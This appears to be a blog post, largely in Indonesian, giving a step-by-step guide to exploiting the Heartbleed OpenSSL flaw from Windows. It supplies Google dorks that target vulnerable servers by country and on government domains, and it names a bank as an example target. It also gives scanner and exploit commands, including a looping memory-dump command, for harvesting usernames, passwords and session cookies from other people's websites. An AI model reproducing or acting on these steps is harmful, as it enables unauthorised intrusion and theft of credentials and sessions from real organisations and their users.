Hacking With Heartbleed For WIndows



1. Download Tools Heartbleed-master
    Password For Download : vulnerability
 
2. Extract Tools, Setelah itu Simpan Di Drive C
3. Temukan Target Dengan Google Dork :

"OpenSSL" AND "1.0.1 Server at" OR "1.0.1a Server at" OR "1.0.1b Server at" OR "1.0.1c Server at" OR "1.0.1d Server at" OR "1.0.1e Server at" OR "1.0.1f Server "

inurl:"https://" site:cn
inurl:"https://" site:il
inurl:"https://" site:my
inurl:"https://" site:au
inurl:"https://" site:gov
inurl:"https://" site:go.id
4. SCAN TARGET

Buka Coonsole, masukan:
"python ssltest.py <target>"
Contoh:
"python ssltest.py www.bank*.com"

jika website vulnerability..

5. (a). FIND USER AND PASS

Buka console, masukan:
"python pacemaker.py"
Biarkan..

Buka COnsole baru, masukan:
"python heartbleed.py <target> -x 4"

sekarang agan hanya perlu mencari 'private' user dan pass website tersebut

6. (b) FIND COOKIE-SESSIONS

Buka console, Masukan:
"python pacemaker.py"
biarkan..

Buka console baru, masukan:
"while true; do python heartbleed.py <target> >> /root/out1 ; sleep 5; done"
biarkan..

Buka console baru, masukan:
"tail -f /root/out1"

Sekarang anda hanya perlu mencari cookie-sessions website tersebut.

Note: untuk memudahkan anda mencari, klik 'Search' pada menu bar console -> 'Find' dan ketikan 'user' atau 'cookie' pada kotak find


Inilah Bahaya Celah Heartbleed :

http://bit.ly/1NA8Fju 

Subscribe to receive free email updates: